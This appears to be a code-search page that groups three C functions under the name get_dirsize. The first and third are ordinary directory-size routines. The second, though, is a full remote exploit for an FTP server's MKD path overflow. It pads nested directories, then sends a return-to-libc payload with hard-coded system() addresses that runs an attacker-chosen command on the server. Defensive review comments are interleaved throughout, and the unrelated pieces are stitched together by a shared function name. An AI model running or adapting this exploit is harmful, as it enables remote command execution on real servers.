示例#1
/*
 * Return the combined size, in bytes, of every regular file found under
 * pPath, descending into subdirectories recursively.
 *
 * Returns 0 when pPath cannot be opened as a directory. Entries that
 * cannot be lstat()ed are skipped silently, and anything that is neither a
 * directory nor a regular file (symlinks, devices, sockets, ...) adds
 * nothing to the total.
 *
 * NOTE(review): the type check uses lstat(), so a symlink is classified as
 * a symlink and is not descended into. The recursive call re-opens the
 * entry by path, though, so an entry swapped for a symlink between the
 * lstat() and the opendir() would be followed; this matters when the tree
 * is writable by a less-trusted user. Recursion depth is also not bounded.
 */
double get_dirsize(const char *pPath)
{
    DIR *dir = opendir(pPath);
    if (!dir)
        return 0;

    double total = 0;
    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL)
    {
        if (dot_or_dotdot(entry->d_name))
            continue;

        /* concat_path_file() hands back a heap string; released below. */
        char *full_path = concat_path_file(pPath, entry->d_name);
        struct stat st;
        if (lstat(full_path, &st) == 0)
        {
            if (S_ISDIR(st.st_mode))
                total += get_dirsize(full_path);
            else if (S_ISREG(st.st_mode))
                total += st.st_size;
        }
        free(full_path);
    }
    closedir(dir);
    return total;
}
示例#2
文件: 113_1.c 项目: B-Rich/osf_db
/*
 * Proof-of-concept client that appears to target a path-length overflow in
 * an FTP server's MKD handling (the builds it was written against are named
 * in the comments on the address table below).
 *
 * Flow, as visible in this function:
 *   1. copy argv[1..5] into the buffers host/user/pass/dir/command
 *   2. select a hard-coded address pair from argv[6]
 *   3. connect, log in with USER/PASS and CWD into the given directory
 *   4. create and enter nested directories whose names are up to 255
 *      repetitions of one character, until the path length nears BSIZE
 *   5. send one final MKD whose argument carries the address pair and the
 *      command string
 *
 * What the server side sees: an authenticated session issuing a run of
 * MKD/CWD pairs with ~255-byte names made of a single repeated character,
 * then an MKD whose argument contains non-printable bytes. Limiting path
 * component/total path length and denying write access to untrusted logins
 * both cut this sequence short.
 *
 * NOTE(review): host, user, pass, dir, command, tmp, netbuf, buff, the
 * counters and the socket variables are declared outside this listing, so
 * none of the buffer sizes can be checked from here.
 */
int main (int argc, char *argv[]) {


  /* Six arguments are mandatory (host, user, pass, dir, command, type);
   * port and alignment are optional. Note the usage path exits with 0. */
  if (argc < 7)  {
    usage(argv[0]);
    exit(0);
  }

  /* Unbounded copies of command-line arguments into buffers whose sizes are
   * not visible here: an over-long argument overruns the destination.
   * snprintf() with the destination size would bound each copy. */
  sprintf(host, "%s", argv[1]);
  sprintf(user, "%s", argv[2]);
  sprintf(pass, "%s", argv[3]);
  sprintf(dir, "%s", argv[4]);
  sprintf(command, "%s", argv[5]);
  
  /* atoi() reports no errors; non-numeric input yields 0 and therefore
   * selects the first table entry below. */
  tipo = atoi (argv[6]);
  printf ( "%d\n\n", tipo);
 
  /* Optional overrides; the defaults are set outside this listing. */
  if ( argc > 7) port = atoi(argv[7]);
  if ( argc > 8) align = atoi(argv[8]);

  
  /* Address table: two absolute addresses per target build. The final
   * printf labels the first "system" and the second "command". Hard-coded
   * addresses only hold where the target process has a fixed memory layout;
   * address-space randomisation removes that assumption. */
  if (tipo <= 0) {
  /* 2.4(4) libc5 slack 3.4 */
   systemaddr = 0x400441f0;
   shelladdr = 0x80604a0;
  } else if (tipo == 1) {
  /* beta 15 libc5 slack 3.4 */ 
   systemaddr = 0x400441f0;
   shelladdr = 0x8062510;
  } else if (tipo == 2) {
/* 2.4(4) libc5 slack 3.3 */
   systemaddr = 0x400441f0;
   shelladdr = 0x805f1e4;
  } else { 
 /* CUSTOM ADDRESS */
   /* SYSADDR and EGGADDR are compile-time macros defined elsewhere. */
   systemaddr = SYSADDR;
   shelladdr = EGGADDR;
  }

  /* The return value of socket() is not checked. */
  sd = socket ( AF_INET, SOCK_STREAM, 0);

  sa.sin_family = AF_INET;
  sa.sin_port = htons(port);
 
  /* Resolve by name first, then fall back to parsing a dotted-quad. */
  he = gethostbyname (host);
  if (!he) {
    if ( (sa.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
      printf ( "wrong ip address or unknown hostname\n"); exit(0);
    }
  } 
  else {
    /* NOTE(review): copies h_length bytes without comparing it to
     * sizeof(sa.sin_addr). */
    bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
  } 
 
  /* Any connect() failure is reported as "Connection refused"; errno is
   * not consulted. */
  if ( connect ( sd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    printf ( "Cannot connect to remote host: Connection refused\n");
    exit(0);
  }

  /* Server banner. The byte count returned by read() is discarded here and
   * at every later read(), so a reply that fills netbuf leaves it without a
   * terminating NUL for the %s that follows. Everything in netbuf is
   * untrusted server data. */
  read ( sd, netbuf, sizeof(netbuf));
  printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
  /* ok. we're connected. */
  /* Each command line is assembled with unbounded strcpy()/strcat() into
   * tmp; the same pattern repeats for PASS, CWD and MKD below. */
  strcpy ( tmp, "USER "); strcat (tmp, user); strcat ( tmp, "\n");
  write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
  read ( sd, netbuf, sizeof(netbuf));
  printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
  /* ok. send the pass. */   
  strcpy ( tmp, "PASS "); strcat (tmp, pass); strcat ( tmp, "\n");
  write ( sd, tmp, strlen(tmp));  bzero ( &tmp, sizeof(tmp));
  read ( sd, netbuf, sizeof(netbuf));
  /* A reply starting with '5' is treated as a rejected login. */
  if ( netbuf[0] == '5') {
    printf ("Login incorrect!\n"); exit(0); }

  printf ( "%s\n", netbuf); 
#ifdef DEBUG
  printf ( "Ok, we're on! Press any key to exploit it\n"); 
  /* gets() has no length bound and was removed from the language in C11. */
  gets(netbuf);
#endif
  bzero ( &netbuf, sizeof(netbuf));

 /* ok. let's get to the vulnerable dir */
  strcpy ( tmp, "CWD "); strcat (tmp, dir); strcat ( tmp, "\n");
  write ( sd, tmp, strlen(tmp)); bzero ( &tmp, sizeof(tmp));
  read ( sd, netbuf, sizeof(netbuf));
  printf ( "%s\n", netbuf); bzero ( &netbuf, sizeof(netbuf));
 

  /* NOTE(review): called with no arguments; presumably a helper defined
   * elsewhere in this file that sets `dirsize` - not shown here. */
  get_dirsize(); /* gets home dir size */


  /* Number of path bytes still to be created; the constants 60 and 4 are
   * not explained in this listing. */
  todo = BSIZE - dirsize - 60 - 4;

  
  /* ok, we're on. let's get things working here! */
  /* Padding phase: one MKD + CWD per iteration, each directory name being
   * `doit` copies of the character in c. */
  while(done < todo) {
   
    /* Each name is capped at 255 bytes. */
    if((todo - done) > 255) 
      doit = 255;
    else
      doit = todo - done;

   
    for (i = 0; i < doit; i++)
      buff[i] = c; 
    buff[doit] = '\0';
   

    strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n"); 
    write ( sd, tmp, strlen(tmp));
    read ( sd, netbuf, sizeof(netbuf));
    /* A reply whose second digit is '2' is treated as failure; the fill
     * character is advanced and the same length is retried. */
    if ( netbuf[1] == '2') {
      printf ("error while creating the dir, let's try another name...\n\n");
      c++;      
      continue;
    }
    else 
      done += doit;

    bzero ( &tmp, sizeof(tmp));  bzero ( &netbuf, sizeof(netbuf));
    strcpy ( tmp, "CWD "); strcat ( tmp, buff); strcat ( tmp, "\n");
    write ( sd, tmp, strlen(tmp)); 
    read ( sd, netbuf, sizeof(netbuf));
    /* A failed CWD is only reported; the loop carries on regardless. */
    if ( netbuf[0] == '5') {
      printf ("error while exploiting the remote host: Cannot cd dir!\n\n");
    }
    bzero ( &tmp, sizeof(tmp));  bzero ( &netbuf, sizeof(netbuf));
  }


 
  /* prepare last one */
  
  /* Final directory name: MAXLEN filler bytes, then overwritten in place. */
  memset(buff, 'X', MAXLEN);

  /* systemaddr written least-significant byte first, repeated every four
   * bytes from offset `align` up to offset 100. */
  for(i = align; i < 100; i += 4) {
    buff[i  ] = systemaddr & 0x000000ff;
    buff[i+1] = (systemaddr & 0x0000ff00) >> 8;
    buff[i+2] = (systemaddr & 0x00ff0000) >> 16;
    buff[i+3] = (systemaddr & 0xff000000) >> 24;
  }

  /* shelladdr follows once, in the same byte order. */
  buff[i++] = shelladdr & 0x000000ff;
  buff[i++] = (shelladdr & 0x0000ff00) >> 8;
  buff[i++] = (shelladdr & 0x00ff0000) >> 16;
  buff[i++] = (shelladdr & 0xff000000) >> 24;

  /* The command string gets a trailing ';' and is copied to offset 140.
   * Neither the strcat() nor the memcpy() checks the destination size. */
  strcat(command, ";");
  memcpy(buff+140, command, strlen(command));


  /* Requires buff to hold at least MAXLEN + 1 bytes. */
  buff[MAXLEN] = '\0'; 
 
  strcpy ( tmp, "MKD "); strcat ( tmp, buff); strcat ( tmp, "\n"); 
  write ( sd, tmp, strlen(tmp));
  read ( sd, netbuf, sizeof(netbuf));
  bzero ( &tmp, sizeof(tmp));  bzero ( &netbuf, sizeof(netbuf));

  /* ok. */

  /* The server's reply to the last MKD was discarded above; nothing here
   * verifies the outcome. */
  printf ( "Exploiting %s\n", dir);
  printf ( "Using 0x%x(system) and 0x%x(command), alignment = %d, port = %d\n", systemaddr, shelladdr, align, port);
  printf("\nI guess you're a hax0r now :D.\n");
 
  close (sd);

  /* No explicit return statement; control falls off the end of main(). */
}
示例#3
/*
 * Return the combined size, in bytes, of everything under pPath and,
 * optionally, report which immediate subdirectory is the "worst" one.
 *
 * pPath      directory to scan
 * worst_dir  if non-NULL, set to NULL on entry and, when a candidate is
 *            found, to a heap-allocated copy (xstrdup) of that
 *            subdirectory's name; the final value is not freed here, so
 *            the caller owns it
 * excluded   if non-NULL, a subdirectory name that is never chosen as the
 *            candidate (its size still counts toward the total)
 *
 * A subdirectory is ranked by size_in_KiB * age_in_minutes, where age is
 * taken from its mtime; a non-positive age leaves the weight at the plain
 * KiB size. Only directories accepted by this_is_a_dd() can become the
 * candidate, so a stray directory is logged but never reported.
 *
 * Returns 0 when pPath cannot be opened. Entries that fail lstat() are
 * skipped. lstat() is used, so symlinks are neither counted nor entered.
 */
double get_dirsize_find_largest_dir(
		const char *pPath,
		char **worst_dir,
		const char *excluded)
{
    if (worst_dir)
        *worst_dir = NULL;

    DIR *dir = opendir(pPath);
    if (!dir)
        return 0;

    const time_t now = time(NULL);
    double total = 0;
    double heaviest = 0;
    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL)
    {
        if (dot_or_dotdot(entry->d_name))
            continue;

        char *full_path = concat_path_file(pPath, entry->d_name);
        struct stat st;
        if (lstat(full_path, &st) != 0)
        {
            free(full_path);
            continue;
        }

        if (S_ISREG(st.st_mode))
        {
            total += st.st_size;
        }
        else if (S_ISDIR(st.st_mode))
        {
            double dir_bytes = get_dirsize(full_path);
            total += dir_bytes;

            int may_be_worst = worst_dir
                    && (!excluded || strcmp(excluded, entry->d_name) != 0);
            if (may_be_worst)
            {
                /* weight = size in KiB, scaled by age in minutes */
                double weight = dir_bytes / 1024;
                long age_mins = (now - st.st_mtime) / 60;
                if (age_mins > 0)
                    weight *= age_mins;

                if (weight > heaviest)
                {
                    if (this_is_a_dd(full_path))
                    {
                        heaviest = weight;
                        free(*worst_dir);
                        *worst_dir = xstrdup(entry->d_name);
                    }
                    else
                    {
                        /* VERB1 is a project macro prefixed to the call; keep
                         * the braces so its expansion cannot pair with a
                         * neighbouring else. */
                        VERB1 log("'%s' isn't a problem directory, probably a stray directory?", full_path);
                    }
                }
            }
        }

        free(full_path);
    }
    closedir(dir);
    return total;
}